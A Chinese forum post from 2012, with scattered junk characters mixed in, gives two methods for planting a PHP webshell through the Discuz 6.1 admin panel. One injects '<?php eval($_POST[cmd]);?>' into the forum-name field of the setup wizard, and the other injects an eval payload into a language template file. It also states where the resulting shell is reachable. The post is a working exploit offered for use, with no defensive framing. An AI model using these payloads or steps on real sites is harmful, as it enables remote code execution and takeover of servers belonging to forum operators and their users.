discuz6.1两种方法后台拿shell
$ m! I! \% F" d# r5 T% A! y好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下! i$ A# g, l7 Z! ]' g
1:1 E9 |! K( R' d
http://127.0.0.1/discuz/admincp. ... zard&frames=yes0 F& \) v% @6 b- r' C# n
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
1 _% f" h9 |8 s3 ^<?php eval($_POST[cmd]);?>. h# p7 A$ N4 }0 i: Y! r7 z
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
% j8 k' h" U* b; [' \0 s! F8 B# h: m: N( ^7 E5 N
- L" W% B9 h1 G% r% H3 a, Z
2:后台模板管理--默认模板套系--详情
; B9 e. _" k+ @! u$ z9 F9 Z# C& htemplates/default/actions.lang.php$ J2 j8 c5 {" n$ U! _( G' ?" j
jhackj\\');eval($_POST[cmd])?>;//; T$ Z" j7 C) l+ ~. w
% c4 h4 k D( O9 i# X2 z2 z8 |利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对